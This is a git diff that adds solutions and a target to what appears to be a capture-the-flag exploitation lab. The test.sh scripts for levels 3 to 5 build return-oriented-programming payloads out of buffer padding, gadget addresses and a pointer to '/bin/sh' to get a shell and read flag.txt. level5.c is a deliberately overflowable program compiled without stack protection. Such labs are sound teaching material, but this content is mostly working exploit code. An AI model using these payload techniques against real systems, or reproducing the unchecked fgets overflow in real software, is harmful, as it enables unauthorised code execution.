diff --git a/4/level3/test.sh b/4/level3/test.sh
new file mode 100755
index 0000000..22c46e4
--- /dev/null
+++ b/4/level3/test.sh
@@ -0,0 +1,8 @@
+OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
+GADGET1="\xc3\x12\x40\00\00\00\00\00"
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level4/test.sh b/4/level4/test.sh
new file mode 100755
index 0000000..dc11693
--- /dev/null
+++ b/4/level4/test.sh
@@ -0,0 +1,9 @@
+OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\xa4\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\xa3\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level5/flag.txt b/4/level5/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level5/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level5/input.txt b/4/level5/input.txt
new file mode 100644
index 0000000..7779602
Binary files /dev/null and b/4/level5/input.txt differ
diff --git a/4/level5/level5 b/4/level5/level5
new file mode 100755
index 0000000..069e0cd
Binary files /dev/null and b/4/level5/level5 differ
diff --git a/4/level5/level5.c b/4/level5/level5.c
new file mode 100644
index 0000000..e9270d2
--- /dev/null
+++ b/4/level5/level5.c
@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include <stdio.h>
+#include <stdlib.h>
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  system("echo Bye.");
+  return 0;
+}
diff --git a/4/level5/test.sh b/4/level5/test.sh
new file mode 100755
index 0000000..2b1e0fd
--- /dev/null
+++ b/4/level5/test.sh
@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g     O .data	0000000000000008              command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"